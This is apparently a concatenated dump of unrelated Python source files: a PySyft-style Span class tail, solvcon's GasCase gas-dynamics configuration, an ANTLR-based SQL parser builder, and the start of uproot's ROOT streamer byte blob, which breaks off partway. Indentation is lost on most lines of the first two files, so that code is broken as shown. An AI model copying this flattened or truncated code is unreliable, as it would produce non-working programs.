# Enforcing that the values of the excluded_tokens dict are sets, not lists.
excluded_tokens = {
attribute: set(excluded_tokens[attribute]) for attribute in excluded_tokens
}
vectors = None
# Count the tokens that have vectors
vector_count = 0
for token in self:
# Get the vector of the token if one exists and if token is not excluded
            # Include the token unless one of its excluded-attribute values
            # matches. (all() over an empty sequence is True, so tokens
            # without the listed attributes are included.)
            include_token = all(
                getattr(token._, key) not in excluded_tokens[key]
                for key in excluded_tokens.keys()
                if hasattr(token._, key)
            )
if token.has_vector and include_token:
# Increment the vector counter
vector_count += 1
                # Accumulate the token vectors by summing them
                vectors = token.vector if vectors is None else vectors + token.vector
        # If no tokens with vectors were found, just use the default vector (zeros)
if vector_count == 0:
span_vector = self.doc.vocab.vectors.default_vector
else:
# Create the final span vector
span_vector = vectors / vector_count
return span_vector
def as_doc(self):
"""Create a `Doc` object with a copy of the `Span`'s tokens.
Returns :
The new `Doc` copy (or id to `Doc` object) of the span.
"""
# Handle circular imports
from .doc import Doc
# Create a new doc object on the required location
# Assign the same owner on which this object resides
# Client of the doc created will be same as the span's client
doc = Doc(self.doc.vocab, owner=self.owner, client_id=self.client_id)
# Iterate over the token_meta present in span
for idx in range(self.start, self.end):
# Add token meta object to the new doc
doc.container.append(self.doc.container[idx])
# Same reason as explained in __getitem__ above
if doc.owner.id != doc.client_id:
# Register the Doc on its owner's object store
doc.owner.register_obj(obj=doc)
# Return doc_id which can be used to create DocPointer
return doc.id
return doc
@staticmethod
def create_pointer(
span,
location: BaseWorker = None,
id_at_location: (str or int) = None,
register: bool = False,
owner: BaseWorker = None,
ptr_id: (str or int) = None,
garbage_collect_data: bool = True,
):
"""Creates a SpanPointer object that points to a Span object living in the the worker 'location'.
Returns:
SpanPointer: pointer object to a Span
"""
# I put the import here in order to avoid circular imports
from .pointers.span_pointer import SpanPointer
if id_at_location is None:
id_at_location = span.id
if owner is None:
owner = span.owner
span_pointer = SpanPointer(
location=location,
id_at_location=id_at_location,
owner=owner,
id=ptr_id,
garbage_collect_data=garbage_collect_data,
)
return span_pointer

# ============================================================================
# File: solvcon/parcel/gas/case.py | Repo: j8xixo12/solvcon
# License: BSD-3-Clause
# ============================================================================

# -*- coding: UTF-8 -*-
#
# Copyright (c) 2014, Yung-Yu Chen <yyc@solvcon.net>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
The control interface.
"""
import solvcon as sc
from . import solver as gassolver
class GasCase(sc.MeshCase):
"""
Temporal loop for the gas-dynamic solver.
"""
defdict = {
'solver.solvertype': gassolver.GasSolver,
'solver.domaintype': sc.Domain,
        # Do not touch the following c-tau parameters.
'solver.alpha': 1,
'solver.sigma0': 3.0,
'solver.taylor': 1.0,
'solver.cnbfac': 1.0,
'solver.sftfac': 1.0,
'solver.taumin': None,
'solver.tauscale': None,
        # End of c-tau parameters.
'io.rootdir': sc.env.projdir, # Different default to MeshCase.
}
def make_solver_keywords(self):
kw = super(GasCase, self).make_solver_keywords()
        # Equation count and time-marching parameters.
neq = self.blk.ndim + 2
kw['neq'] = self.execution.neq = neq
kw['time'] = self.execution.time
kw['time_increment'] = self.execution.time_increment
# c-tau scheme parameters.
kw['alpha'] = int(self.solver.alpha)
        for key in ('sigma0', 'taylor', 'cnbfac', 'sftfac',
                    'taumin', 'tauscale'):
            val = self.solver.get(key)
            if val is not None:
                kw[key] = float(val)
return kw
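# A minimal usage sketch (constructor arguments are hypothetical; the
# exact MeshCase keywords depend on the solvcon version in use):
#
#     cse = GasCase(basefn='gasdemo', time_increment=1.e-3, steps_run=100)
#     kw = cse.make_solver_keywords()
#     # kw now carries 'neq' (= ndim + 2), the time settings, and every
#     # non-None c-tau parameter coerced to float.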
# vim: set ff=unix fenc=utf8 ft=python ai et sw=4 ts=4 tw=79:
| 37.545455
| 79
| 0.682809
|
361fe3a95aef2fc417c0d772f200082abbd7f713
| 3,095
|
py
|
Python
|
src/sqlparser/internalparser.py
|
pysparkling/python-sql-parser
|
b728995ce66e1feba1c0b1b8310edce8f3fa9d83
|
[
"Apache-2.0"
] | 2
|
2021-07-02T13:06:36.000Z
|
2021-07-22T12:19:53.000Z
|
src/sqlparser/internalparser.py
|
pysparkling/python-sql-parser
|
b728995ce66e1feba1c0b1b8310edce8f3fa9d83
|
[
"Apache-2.0"
] | null | null | null |
src/sqlparser/internalparser.py
|
pysparkling/python-sql-parser
|
b728995ce66e1feba1c0b1b8310edce8f3fa9d83
|
[
"Apache-2.0"
] | 1
|
2021-07-02T13:06:40.000Z
|
2021-07-02T13:06:40.000Z
|
import antlr4
from antlr4 import RecognitionException
from antlr4.error.ErrorListener import ErrorListener
from antlr4.error.ErrorStrategy import BailErrorStrategy
from antlr4.error.Errors import ParseCancellationException
from sqlparser.generated.SqlBaseLexer import SqlBaseLexer
from sqlparser.generated.SqlBaseParser import SqlBaseParser
class RemoveIdentifierBackticks(antlr4.ParseTreeListener):
@staticmethod
def exitQuotedIdentifier(ctx): # pylint: disable=invalid-name,unused-argument
def identity(token):
return token
return identity
@staticmethod
def enterNonReserved(ctx): # pylint: disable=invalid-name,unused-argument
def add_backtick(token):
return "`{0}`".format(token)
return add_backtick
class ParseErrorListener(ErrorListener):
def syntaxError(
self, recognizer, offendingSymbol, line, column, msg, e
): # pylint: disable=invalid-name,no-self-use,too-many-arguments
raise SqlSyntaxError("Parse error", msg)
class UpperCaseCharStream:
"""
    Make SQL token detection case-insensitive and allow identifiers
    without backticks to be seen as, e.g., column names
"""
def __init__(self, wrapped):
self.wrapped = wrapped
def getText(self, interval, *args): # pylint: disable=invalid-name
if args or (self.size() > 0 and (interval.b - interval.a >= 0)):
return self.wrapped.getText(interval, *args)
return ""
def LA(self, i: int): # pylint: disable=invalid-name
token = self.wrapped.LA(i)
if token in (0, -1):
return token
return ord(chr(token).upper())
def __getattr__(self, item):
return getattr(self.wrapped, item)
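# Behaviour sketch of the case folding done by LA() (plain Python, no
# ANTLR needed): each lookahead code point is upper-cased before the
# lexer compares it against keyword tokens, e.g.
#
#     >>> ord(chr(ord("s")).upper()) == ord("S")
#     True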
class ExplicitBailErrorStrategy(BailErrorStrategy):
"""
    BailErrorStrategy throws a ParseCancellationException;
    this strategy simply throws a more explicit exception
"""
def recover(self, recognizer, e: RecognitionException):
try:
super(ExplicitBailErrorStrategy, self).recover(recognizer, e)
except ParseCancellationException:
raise SqlParsingError from e
class EarlyBailSqlLexer(SqlBaseLexer):
def recover(self, re: RecognitionException):
raise SqlLexicalError from re
def build_parser(stream, strict_mode=False, early_bail=True):
if not strict_mode:
stream = UpperCaseCharStream(stream)
if early_bail:
lexer = EarlyBailSqlLexer(stream)
else:
lexer = SqlBaseLexer(stream)
lexer.removeErrorListeners()
lexer.addErrorListener(ParseErrorListener())
token_stream = antlr4.CommonTokenStream(lexer)
parser = SqlBaseParser(token_stream)
parser.addParseListener(RemoveIdentifierBackticks())
parser.removeErrorListeners()
parser.addErrorListener(ParseErrorListener())
if early_bail:
parser._errHandler = ExplicitBailErrorStrategy()
return parser
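# A minimal usage sketch (the entry rule name `singleStatement` is an
# assumption; it depends on the SqlBase.g4 grammar the parser was
# generated from):
#
#     stream = antlr4.InputStream("SELECT a FROM t")
#     parser = build_parser(stream)
#     tree = parser.singleStatement()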
class SqlParsingError(Exception):
pass
class SqlLexicalError(SqlParsingError):
pass
class SqlSyntaxError(SqlParsingError):
pass
| 29.47619
| 82
| 0.710501
|
ab93de25995d3ad9754eb1643106442f26abf1bb
| 115,560
|
py
|
Python
|
uproot/write/streamers.py
|
riga/uproot
|
78de42f849079c35fd05ae22033e56f02492b6c1
|
[
"BSD-3-Clause"
] | 1
|
2021-03-18T23:33:35.000Z
|
2021-03-18T23:33:35.000Z
|
uproot/write/streamers.py
|
riga/uproot
|
78de42f849079c35fd05ae22033e56f02492b6c1
|
[
"BSD-3-Clause"
] | 17
|
2020-01-28T22:33:27.000Z
|
2021-06-10T21:05:49.000Z
|
sparse/repos/chnzhangrui/SgTopWorkshop/binder/uproot/write/streamers.py
|
yuvipanda/mybinder.org-analytics
|
7b654e3e21dea790505c626d688aa15640ea5808
|
[
"BSD-3-Clause"
] | 1
|
2021-07-17T12:55:22.000Z
|
2021-07-17T12:55:22.000Z
|
#!/usr/bin/env python
# Copyright (c) 2017, DIANA-HEP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# just TObjString (for debugging)
# streamers = b'@\x00\x01n\x00\x05\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01@\x00\x01X\xff\xff\xff\xffTStreamerInfo\x00@\x00\x01B\x00\t@\x00\x00\x18\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\nTObjString\x00\x9c\x8eH\x00\x00\x00\x00\x01@\x00\x01\x18\xff\xff\xff\xffTObjArray\x00@\x00\x01\x06\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00u\xff\xff\xff\xffTStreamerBase\x00@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00t\xff\xff\xff\xffTStreamerString\x00@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00$\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fString\x0fwrapped TString\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString\x00'
# all useful streamers (histograms, etc.)
streamers = b'@\x00\xa0a\x00\x05\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00C@\x00\x01X\xff\xff\xff\xffTStreamerInfo\x00@\x00\x01B\x00\t@\x00\x00\x18\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\nTObjString\x00\x9c\x8eH\x00\x00\x00\x00\x01@\x00\x01\x18\xff\xff\xff\xffTObjArray\x00@\x00\x01\x06\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00u\xff\xff\xff\xffTStreamerBase\x00@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00t\xff\xff\xff\xffTStreamerString\x00@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00$\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fString\x0fwrapped TString\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString\x00@\x00\x01H\x80\x00\x00[@\x00\x01@\x00\t@\x00\x00\x15\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x07TObject\x00\x90\x1b\xc0-\x00\x00\x00\x01@\x00\x01\x19\x80\x00\x00\x9b@\x00\x01\x11\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00\x87\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00l\x00\x02@\x00\x00f\x00\x04@\x00\x00/\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfUniqueID\x18object unique identifier\x00\x00\x00\r\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0cunsigned int@\x00\x00m\x80\x00\x02\x08@\x00\x00e\x00\x02@\x00\x00_\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fBits\x15bit field status word\x00\x00\x00\x0f\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0cunsigned int\x00@\x00\x01\xb3\x80\x00\x00[@\x00\x01\xab\x00\t@\x00\x00\x1c\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x0eTLorentzVector\x00\xe3\xde\xc1\xa1\x00\x00\x00\x04@\x00\x01}\x80\x00\x00\x9b@\x00\x01u\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00g\x80\x00\x00\xc6@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00s\xff\xff\xff\xffTStreamerObject\x00@\x00\x00[\x00\x02@\x00\x00U\x00\x04@\x00\x00"\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fP\x123 vector component\x00\x00\x00=\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08TVector3@\x00\x00z\x80\x00\x02\x08@\x00\x00r\x00\x02@\x00\x00l\x00\x04@\x00\x00;\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fE+time or energy of (x,y,z,t) or 
(px,py,pz,e)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double\x00@\x00\x01\xb1\x80\x00\x00[@\x00\x01\xa9\x00\t@\x00\x00\x16\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x08TVector3\x00\xab\xb6\xbe\x1e\x00\x00\x00\x03@\x00\x01\x81\x80\x00\x00\x9b@\x00\x01y\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00@\x00\x00g\x80\x00\x00\xc6@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00O\x80\x00\x02\x08@\x00\x00G\x00\x02@\x00\x00A\x00\x04@\x00\x00\x10\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fX\x00\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00O\x80\x00\x02\x08@\x00\x00G\x00\x02@\x00\x00A\x00\x04@\x00\x00\x10\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fY\x00\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00O\x80\x00\x02\x08@\x00\x00G\x00\x02@\x00\x00A\x00\x04@\x00\x00\x10\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fZ\x00\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double\x00@\x00\x01v\x80\x00\x00[@\x00\x01n\x00\t@\x00\x00\x16\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x08TVector2\x00\x00\x89\xb7\xf4\x00\x00\x00\x03@\x00\x01F\x80\x00\x00\x9b@\x00\x01>\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00g\x80\x00\x00\xc6@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00g\x80\x00\x02\x08@\x00\x00_\x00\x02@\x00\x00Y\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fX\x18components of the vector\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00O\x80\x00\x02\x08@\x00\x00G\x00\x02@\x00\x00A\x00\x04@\x00\x00\x10\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fY\x00\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double\x00@\x00\x04\r\x80\x00\x00[@\x00\x04\x05\x00\t@\x00\x00\x16\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x08TProfile\x00K\xed\xeeT\x00\x00\x00\x06@\x00\x03\xdd\x80\x00\x00\x9b@\x00\x03\xd5\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00@\x00\x00|\x80\x00\x00\xc6@\x00\x00t\x00\x03@\x00\x00j\x00\x04@\x00\x00;\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x04TH1D)1-Dim histograms (one double per 
channel)\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf9\xb1V\x9f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00\x85\xff\xff\xff\xffTStreamerObjectAny\x00@\x00\x00j\x00\x02@\x00\x00d\x00\x04@\x00\x002\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfBinEntries\x19number of entries per bin\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00s\x80\x00\x02\x08@\x00\x00k\x00\x02@\x00\x00e\x00\x04@\x00\x000\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfErrorMode\x18Option to compute errors\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nEErrorType@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fYmin\x19Lower limit in Y (if set)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fYmax\x19Upper limit in Y (if set)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00i\x80\x00\x02\x08@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fTsumwy\x15Total Sum of weight*Y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwy2\x17Total Sum of weight*Y*Y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00\x81\x80\x00\x08\xbf@\x00\x00y\x00\x02@\x00\x00s\x00\x04@\x00\x00A\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfBinSumw2*Array of sum of squares of weights per bin\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD\x00@\x00\x01#\x80\x00\x00[@\x00\x01\x1b\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH1D\x00\xf9\xb1V\x9f\x00\x00\x00\x02@\x00\x00\xf7\x80\x00\x00\x9b@\x00\x00\xef\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH1\x1a1-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c7@\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x08@\x00\x00f\x80\x00\x00\xc6@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayD\x10Array of 
doubles\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00q9\xef4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x0cl\x80\x00\x00[@\x00\x0cd\x00\t@\x00\x00\x11\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x03TH1\x00\x1c7@\xc4\x00\x00\x00\x08@\x00\x0cA\x80\x00\x00\x9b@\x00\x0c9\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00@\x00\x00\x7f\x80\x00\x00\xc6@\x00\x00w\x00\x03@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06TNamed*The basis for a named object (name, title)\x00\x00\x00C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdf\xb7J<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00f\x80\x00\x00\xc6@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttLine\x0fLine attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x94\x07EI\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00k\x80\x00\x00\xc6@\x00\x00c\x00\x03@\x00\x00Y\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttFill\x14Fill area attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd9*\x92\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00j\x80\x00\x00\xc6@\x00\x00b\x00\x03@\x00\x00X\x00\x04@\x00\x00)\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nTAttMarker\x11Marker attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00)\x1d\x8b\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00|\x80\x00\x02\x08@\x00\x00t\x00\x02@\x00\x00n\x00\x04@\x00\x00@\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fNcells+number of bins(1D), cells (2D) 